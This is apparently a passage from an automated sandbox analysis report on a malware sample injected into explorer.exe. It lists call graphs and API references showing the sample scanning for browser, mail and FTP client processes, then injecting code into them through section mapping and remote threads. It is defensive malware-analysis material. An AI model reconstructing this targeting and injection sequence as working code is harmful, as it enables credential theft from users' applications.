746->753 749 8411fc lstrcmpiA 747->749 747->753 748 842608 VirtualQuery 748->753 750 84120c lstrcmpiA 749->750 749->753 752 84121c lstrcmpiA 750->752 750->753 751 8412ae lstrcmpiA 751->753 752->753 754 84122c lstrcmpiA 752->754 753->736 753->739 753->748 753->751 756 841819 30 API calls 753->756 754->753 755 84123c lstrcmpiA 754->755 755->753 757 84124c lstrcmpiA 755->757 756->753 757->753 758 84125c lstrcmpiA 757->758 758->753 759 84126c lstrcmpiA 758->759 759->739 759->753 761 84101e 760->761 761->714 762 842861 GetProcessHeap RtlAllocateHeap 761->762 762->716 825 842861 GetProcessHeap RtlAllocateHeap 763->825 765 8410cc 766 8410dc CreateToolhelp32Snapshot 765->766 767 8410f0 Process32First 766->767 768 841322 Sleep 766->768 769 84110c lstrcmpiA 767->769 770 84131b FindCloseChangeNotification 767->770 768->766 771 841124 lstrcmpiA 769->771 772 841280 769->772 770->768 771->772 773 841138 lstrcmpiA 771->773 777 841305 Process32Next 772->777 786 842608 VirtualQuery 772->786 789 8412ae lstrcmpiA 772->789 826 8425ad OpenProcess 772->826 832 841819 772->832 773->772 775 84114c lstrcmpiA 773->775 775->772 776 841160 lstrcmpiA 775->776 776->772 778 841170 lstrcmpiA 776->778 777->769 779 841319 777->779 778->772 780 841184 lstrcmpiA 778->780 779->770 780->772 781 841198 lstrcmpiA 780->781 781->772 782 8411ac lstrcmpiA 781->782 782->772 783 8411c0 lstrcmpiA 782->783 783->772 784 8411d4 lstrcmpiA 783->784 784->772 785 8411e8 lstrcmpiA 784->785 785->772 787 8411fc lstrcmpiA 785->787 786->772 787->772 788 84120c lstrcmpiA 787->788 788->772 790 84121c lstrcmpiA 788->790 789->772 790->772 791 84122c lstrcmpiA 790->791 791->772 792 84123c lstrcmpiA 791->792 792->772 794 84124c lstrcmpiA 792->794 794->772 795 84125c lstrcmpiA 794->795 795->772 796 84126c lstrcmpiA 795->796 796->772 796->777 797->722 878 842861 GetProcessHeap RtlAllocateHeap 798->878 800 841340 GetModuleFileNameA 879 842861 GetProcessHeap RtlAllocateHeap 800->879 802 841357 GetCurrentProcessId wsprintfA 880 84263e CryptAcquireContextA 802->880 805 84139c Sleep 885 8424d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 805->885 806 84140d 903 842843 806->903 810 8413ae GetModuleHandleA GetProcAddress 811 8413c9 810->811 812 8413da GetModuleHandleA GetProcAddress 810->812 893 841de3 811->893 815 8413f5 812->815 816 841406 812->816 813 842843 3 API calls 817 84141b RtlExitUserThread 813->817 818 841de3 3 API calls 815->818 819 8424d5 10 API calls 816->819 820 841425 817->820 818->816 819->806 821 84144b 820->821 822 842608 VirtualQuery 820->822 821->721 823 84143a 822->823 823->821 908 841493 823->908 825->765 827 842600 826->827 828 8425cb IsWow64Process 826->828 827->772 829 8425ee 828->829 830 8425dc IsWow64Process 828->830 831 8425f9 CloseHandle 829->831 830->829 830->831 831->827 833 842608 VirtualQuery 832->833 834 841833 833->834 835 841845 OpenProcess 834->835 836 841a76 834->836 835->836 837 84185e 835->837 836->772 838 842608 VirtualQuery 837->838 839 841865 838->839 839->836 840 841873 NtSetInformationProcess 839->840 841 84188f 839->841 840->841 863 841a80 841->863 844 841a80 2 API calls 845 8418d6 844->845 846 841a73 CloseHandle 845->846 847 841a80 2 API calls 845->847 846->836 848 841900 847->848 869 841b17 848->869 851 841a80 2 API calls 852 841930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 851->852 853 841985 852->853 854 841a4e CreateRemoteThread 852->854 856 84198b CreateMutexA GetLastError 853->856 859 8419bb GetModuleHandleA GetProcAddress ReadProcessMemory 853->859 855 841a65 CloseHandle 854->855 857 841a67 CloseHandle CloseHandle 855->857 856->853 858 8419a7 CloseHandle Sleep 856->858 857->846 858->856 860 841a47 859->860 861 8419ec WriteProcessMemory 859->861 860->855 860->857 861->860 862 841a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 861->862 862->860 864 841a94 863->864 865 8418b4 863->865 866 841aa4 NtCreateSection 864->866 867 841ac3 864->867 865->844 866->867 867->865 868 841ad8 NtMapViewOfSection 867->868 868->865 870 841b2e 869->870 876 841b60 869->876 871 841b30 RtlMoveMemory 870->871 871->871 871->876 872 841bc3 873 841910 NtUnmapViewOfSection 872->873 874 841be1 LdrProcessRelocationBlock 872->874 873->851 874->872 874->873 875 841b71 LoadLibraryA 875->873 875->876 876->872 876->875 877 841ba1 GetProcAddress 876->877 877->873 877->876 878->800 879->802 881 842664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 880->881 882 841384 CreateMutexA GetLastError 880->882 883 8426aa wsprintfA 881->883 882->805 882->806 883->883 884 8426cc CryptDestroyHash CryptReleaseContext 883->884 884->882 886 842515 885->886 887 842565 CloseHandle 886->887 888 842555 Thread32Next 886->888 889 842521 OpenThread 886->889 887->810 888->886 890 842544 ResumeThread 889->890 891 84253c SuspendThread 889->891 892 84254a CloseHandle 890->892 891->892 892->888 894 841ded 893->894 902 841e56 893->902 894->902 935 841e93 VirtualProtect 894->935 896 841e04 896->902 936 842815 VirtualAlloc 896->936 898 841e10 899 841e1a RtlMoveMemory 898->899 900 841e2d 898->900 899->900 937 841e93 VirtualProtect 900->937 902->812 904 842608 VirtualQuery 903->904 905 84284b 904->905 906 841414 905->906 907 84284f GetProcessHeap HeapFree 905->907 906->813 907->906 909 8414c0 908->909 910 8414a1 908->910 912 841510 909->912 913 8414c8 909->913 938 8417c7 910->938 957 8426e6 lstrlen lstrlen 912->957 916 8417c7 5 API calls 913->916 933 8414b6 913->933 918 8414e0 916->918 917 84155f 919 8426e6 2 API calls 917->919 918->933 945 841647 918->945 922 84156c 919->922 920 841532 959 841752 GetModuleHandleA GetProcAddress 920->959 924 841584 922->924 926 8415a0 922->926 922->933 962 842404 lstrlen 924->962 929 842404 5 API calls 926->929 926->933 928 8414fb 928->933 968 8415e0 928->968 932 8415ac 929->932 930 841647 11 API calls 930->933 932->933 934 841647 11 API calls 932->934 933->821 934->928 935->896 936->898 937->902 939 841812 938->939 940 8417d1 938->940 939->933 940->939 941 8426e6 2 API calls 940->941 942 8417f1 941->942 942->939 973 842861 GetProcessHeap RtlAllocateHeap 942->973 944 841804 RtlMoveMemory 944->939 946 841660 945->946 956 841745 945->956 947 841671 lstrlen 946->947 946->956 948 841683 lstrlen 947->948 947->956 949 841690 getpeername 948->949 948->956 950 8416ae inet_ntoa htons 949->950 949->956 951 8416cc 950->951 950->956 951->956 974 842861 GetProcessHeap RtlAllocateHeap 951->974 953 841717 wsprintfA 954 84173a 953->954 955 842843 3 API calls 954->955 954->956 955->956 956->928 958 84151d 957->958 958->917 958->920 960 841776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 959->960 961 841539 959->961 960->961 961->930 961->933 963 842456 962->963 964 84241c CryptStringToBinaryA 962->964 963->933 964->963 965 842438 964->965 975 842861 GetProcessHeap RtlAllocateHeap 965->975 967 842444 CryptStringToBinaryA 967->963 969 842843 3 API calls 968->969 970 8415f5 969->970 971 842843 3 API calls 970->971 972 8415fc 971->972 972->933 973->944 974->953 975->967 1061 84245e lstrlen 1062 8424a5 1061->1062 1063 842476 CryptBinaryToStringA 1061->1063 1063->1062 1064 842489 1063->1064 1067 842861 GetProcessHeap RtlAllocateHeap 1064->1067 1066 842494 CryptBinaryToStringA 1066->1062 1067->1066 976 847728 977 847904 976->977 978 84774b 976->978 977->977 979 84785a LoadLibraryA 978->979 982 84789f VirtualProtect VirtualProtect 978->982 980 847871 979->980 980->978 983 847883 GetProcAddress 980->983 982->977 983->980 984 847899 983->984

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00842404 30 Function_00842861 0->30 1 Function_00842806 2 Function_00841647 9 Function_00842843 2->9 2->30 34 Function_008424AE 2->34 3 Function_008417C7 28 Function_008426E6 3->28 3->30 4 Function_00841A80 5 Function_00841DC0 24 Function_00841C19 5->24 6 Function_00841D80 6->24 7 Function_00841000 14 Function_00841016 7->14 8 Function_00842841 10 Function_00842608 9->10 11 Function_00841F4A 11->9 13 Function_00842815 11->13 27 Function_008422E5 11->27 11->30 31 Function_008427E2 11->31 37 Function_00842374 11->37 39 Function_00842731 11->39 43 Function_008422B8 11->43 12 Function_008424D5 14->10 17 Function_00842592 14->17 23 Function_00841819 14->23 25 Function_008410A4 14->25 14->30 33 Function_008425AD 14->33 14->39 40 Function_00841332 14->40 41 Function_00842573 14->41 15 Function_00841B17 16 Function_00843417 18 Function_00841752 19 Function_00841493 19->0 19->2 19->3 19->18 19->28 29 Function_008415E0 19->29 20 Function_00841E93 21 Function_00841E5D 21->6 22 Function_0084245E 22->30 23->4 23->10 23->15 25->10 25->17 25->23 25->30 25->33 25->39 25->41 26 Function_00841425 26->10 26->19 27->30 27->31 29->9 32 Function_00841DE3 32->5 32->13 32->20 32->21 35 Function_00847728 36 Function_00841469 36->10 36->19 38 Function_00841EB6 38->9 38->11 38->30 40->9 40->10 40->12 40->19 40->30 40->32 42 Function_0084263E 40->42 43->28

                        Executed Functions

                        Function 00841016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244stringsleepprocessCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 841016-841020 call 842608 3 841097-841098 0->3 4 841022-84104b call 842861 RtlMoveMemory 0->4 7 841071-841090 NtUnmapViewOfSection GetCurrentProcessId 4->7 8 84104d-84106b call 842861 RtlMoveMemory 4->8 10 841092-841093 7->10 11 84109e-8410d7 call 8410a4 call 842861 7->11 8->7 10->3 13 841095-841099 call 841332 10->13 21 8410dc-8410ea CreateToolhelp32Snapshot 11->21 13->11 22 8410f0-841106 Process32First 21->22 23 841322-84132d Sleep 21->23 24 84110c-84111e lstrcmpiA 22->24 25 84131b-84131c FindCloseChangeNotification 22->25 23->21 26 841124-841132 lstrcmpiA 24->26 27 841280-841289 call 8425ad 24->27 25->23 26->27 28 841138-841146 lstrcmpiA 26->28 33 841305-841313 Process32Next 27->33 34 84128b-841294 call 842592 27->34 28->27 30 84114c-84115a lstrcmpiA 28->30 30->27 32 841160-84116a lstrcmpiA 30->32 32->27 35 841170-84117e lstrcmpiA 32->35 33->24 36 841319 33->36 34->33 40 841296-84129d call 842573 34->40 35->27 38 841184-841192 lstrcmpiA 35->38 36->25 38->27 41 841198-8411a6 lstrcmpiA 38->41 40->33 47 84129f-8412ac call 842608 40->47 41->27 43 8411ac-8411ba lstrcmpiA 41->43 43->27 45 8411c0-8411ce lstrcmpiA 43->45 45->27 46 8411d4-8411e2 lstrcmpiA 45->46 46->27 48 8411e8-8411f6 lstrcmpiA 46->48 47->33 53 8412ae-841300 lstrcmpiA call 842731 call 841819 call 842731 47->53 48->27 50 8411fc-84120a lstrcmpiA 48->50 50->27 52 84120c-84121a lstrcmpiA 50->52 52->27 54 84121c-84122a lstrcmpiA 52->54 53->33 54->27 56 84122c-84123a lstrcmpiA 54->56 56->27 58 84123c-84124a lstrcmpiA 56->58 58->27 60 84124c-84125a lstrcmpiA 58->60 60->27 62 84125c-84126a lstrcmpiA 60->62 62->27 64 84126c-84127a lstrcmpiA 62->64 64->27 64->33
                        APIs
                          • Part of subcall function 00842608: VirtualQuery.KERNEL32(00844434,?,0000001C), ref: 00842615
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00841038
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0084106B
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00841074
                        • GetCurrentProcessId.KERNEL32(?,00841010), ref: 0084107A
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008410DF
                        • Process32First.KERNEL32(00000000,?), ref: 008410FE
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0084111A
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0084112E
                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00841142
                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00841156
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00841166
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0084117A
                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0084118E
                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008411A2
                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008411B6
                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008411CA
                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008411DE
                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008411F2
                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00841206
                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00841216
                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00841226
                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00841236
                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00841246
                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00841256
                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00841266
                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00841276
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008412B4
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0084130B
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0084131C
                        • Sleep.KERNELBASE(000003E8), ref: 00841327
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateChangeCloseCreateCurrentFindFirstNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                        • API String ID: 831104905-1680033604
                        • Opcode ID: 28253ab8c2e0301946c7c4f0e194f82c8de3ad6c92c270dda1c5fb32c90eec75
                        • Instruction ID: b3dc20cd59b085491b3965de9c1cb2a9e761fb56e66bbb99d849fa569cb54b83
                        • Opcode Fuzzy Hash: 28253ab8c2e0301946c7c4f0e194f82c8de3ad6c92c270dda1c5fb32c90eec75
                        • Instruction Fuzzy Hash: 5071903060535DABCF10DFB19C49E6A7BACFF46780B04062AF950C3291EB69DA45CB75
                        Function 008410A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008410DF
                        • Process32First.KERNEL32(00000000,?), ref: 008410FE
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0084111A
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0084112E
                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00841142
                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00841156
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00841166
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0084117A
                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0084118E
                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008411A2
                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008411B6
                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008411CA
                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008411DE
                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008411F2
                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00841206
                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00841216
                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00841226
                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00841236
                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00841246
                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00841256
                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00841266
                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00841276
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008412B4
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0084130B
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0084131C
                        • Sleep.KERNELBASE(000003E8), ref: 00841327
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcmpi$HeapProcess32$AllocateChangeCloseCreateFindFirstNextNotificationProcessSleepSnapshotToolhelp32
                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                        • API String ID: 2875627700-1680033604
                        • Opcode ID: 896528b9abd725dc7435f72b794d3bd64b1d0c6a0a548d0bf553207c367413b4
                        • Instruction ID: 982d65fee869243ccbb05fb858c07044b437a62aa65cb691aa8b8edaed0e4183
                        • Opcode Fuzzy Hash: 896528b9abd725dc7435f72b794d3bd64b1d0c6a0a548d0bf553207c367413b4
                        • Instruction Fuzzy Hash: 96517F7160531DA6DF10DFB19C89E6E7AECFF45B80B440A29FA50C3280EB68DA458B75
                        Function 00847728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 112 847728-847745 113 84790d 112->113 114 84774b-847758 112->114 113->113 115 84776a-84776f 114->115 116 847771 115->116 117 847760-847765 116->117 118 847773 116->118 119 847766-847768 117->119 120 847778-84777a 118->120 119->115 119->116 121 847783-847787 120->121 122 84777c-847781 120->122 121->120 123 847789 121->123 122->121 124 847794-847799 123->124 125 84778b-847792 123->125 126 8477a8-8477aa 124->126 127 84779b-8477a4 124->127 125->120 125->124 130 8477b3-8477b7 126->130 131 8477ac-8477b1 126->131 128 8477a6 127->128 129 84781a-84781d 127->129 128->126 132 847822-847825 129->132 133 8477c0-8477c2 130->133 134 8477b9-8477be 130->134 131->130 135 847827-847829 132->135 136 8477e4-8477f3 133->136 137 8477c4 133->137 134->133 135->132 138 84782b-84782e 135->138 140 847804-847811 136->140 141 8477f5-8477fc 136->141 139 8477c5-8477c7 137->139 138->132 143 847830-84784c 138->143 144 8477d0-8477d4 139->144 145 8477c9-8477ce 139->145 140->140 142 847813-847815 140->142 141->141 146 8477fe 141->146 142->119 143->135 147 84784e 143->147 144->139 148 8477d6 144->148 145->144 146->119 149 847854-847858 147->149 150 8477e1 148->150 151 8477d8-8477df 148->151 152 84789f-8478a2 149->152 153 84785a-847870 LoadLibraryA 149->153 150->136 151->139 151->150 154 8478a5-8478ac 152->154 155 847871-847876 153->155 156 8478d0-847900 VirtualProtect * 2 154->156 157 8478ae-8478b0 154->157 155->149 158 847878-84787a 155->158 161 847904-847908 156->161 159 8478b2-8478c1 157->159 160 8478c3-8478ce 157->160 162 847883-847890 GetProcAddress 158->162 163 84787c-847882 158->163 159->154 160->159 161->161 164 84790a 161->164 165 847892-847897 162->165 166 847899-84789c 162->166 163->162 164->113 165->155
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000846000.00000040.80000000.00040000.00000000.sdmp, Offset: 00846000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_846000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9842741880f68e25a47fc16def667095c992e361676a6f1cde9e26b328523cf
                        • Instruction ID: e9c382edd5b00a824a24a2c7bf7e31cfde7537f12781fd6494817f61f17731c0
                        • Opcode Fuzzy Hash: e9842741880f68e25a47fc16def667095c992e361676a6f1cde9e26b328523cf
                        • Instruction Fuzzy Hash: D3514B7194D39A4FD7218A78CC846B07BA0FB52324B6D0779C5E5CB3C2E7985C0AC7A4
                        Function 00842861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 167 842861-842871 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 2af3da6543ca2deb25f8ab857207552876eb7584ffc9ed1cd4ebd6a56340588e
                        • Instruction ID: d61d8de7671698927f8d7eb1b37a6a3969220c3b896c0e37d749415cb664cb9e
                        • Opcode Fuzzy Hash: 2af3da6543ca2deb25f8ab857207552876eb7584ffc9ed1cd4ebd6a56340588e
                        • Instruction Fuzzy Hash: 99A002755506407FDD5567E4AD0DF553A19B756701F0046447149C5060D964554CCB21

                        Non-executed Functions

                        Function 00841819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842608: VirtualQuery.KERNEL32(00844434,?,0000001C), ref: 00842615
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0084184E
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00841889
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00841919
                        • RtlMoveMemory.NTDLL(00000000,00843428,00000016), ref: 00841940
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00841968
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00841978
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00841992
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0084199A
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008419A8
                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008419AF
                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 008419C5
                        • GetProcAddress.KERNEL32(00000000), ref: 008419CC
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 008419E2
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00841A0C
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00841A1F
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A26
                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A2D
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00841A41
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00841A58
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A65
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A6B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A71
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00841A74
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                        • API String ID: 1066286714-4141090125
                        • Opcode ID: c55329491cefd6df84dcf8b8d030416542cbc786431ed443cde7bb6a4112c05d
                        • Instruction ID: 22d778017a9cba7ce5a6f3a698cb6c4265aa3f4fdb2be14800952c0ba917526e
                        • Opcode Fuzzy Hash: c55329491cefd6df84dcf8b8d030416542cbc786431ed443cde7bb6a4112c05d
                        • Instruction Fuzzy Hash: E2617A35205318AFD710DF659C88E6BBBECFF8A754F000629F949D2251DB74DA44CBA2
                        Function 0084263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0084265A
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00842672
                        • lstrlen.KERNEL32(?,00000000), ref: 0084267A
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00842685
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0084269F
                        • wsprintfA.USER32 ref: 008426B6
                        • CryptDestroyHash.ADVAPI32(?), ref: 008426CF
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008426D9
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: a898373607de22621ab75b5b1a44eeb075fa2c389e596f048c4f460461edc530
                        • Instruction ID: 7da94eef6088f8223d2b1253aa1bee5951320e4fbfc7e1bbeaa2d43ee7dfee74
                        • Opcode Fuzzy Hash: a898373607de22621ab75b5b1a44eeb075fa2c389e596f048c4f460461edc530
                        • Instruction Fuzzy Hash: CC1128B590050CBFDB119B99EC88EAEBFBCFB49741F1041A5F605E2160E6718F01DB60
                        Function 00841332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0084109E,?,00841010), ref: 0084134A
                        • GetCurrentProcessId.KERNEL32(00000003,?,0084109E,?,00841010), ref: 0084135B
                        • wsprintfA.USER32 ref: 00841372
                          • Part of subcall function 0084263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0084265A
                          • Part of subcall function 0084263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00842672
                          • Part of subcall function 0084263E: lstrlen.KERNEL32(?,00000000), ref: 0084267A
                          • Part of subcall function 0084263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00842685
                          • Part of subcall function 0084263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0084269F
                          • Part of subcall function 0084263E: wsprintfA.USER32 ref: 008426B6
                          • Part of subcall function 0084263E: CryptDestroyHash.ADVAPI32(?), ref: 008426CF
                          • Part of subcall function 0084263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 008426D9
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00841389
                        • GetLastError.KERNEL32 ref: 0084138F
                        • Sleep.KERNEL32(000001F4), ref: 008413A1
                          • Part of subcall function 008424D5: GetCurrentProcessId.KERNEL32 ref: 008424E7
                          • Part of subcall function 008424D5: GetCurrentThreadId.KERNEL32 ref: 008424EF
                          • Part of subcall function 008424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008424FF
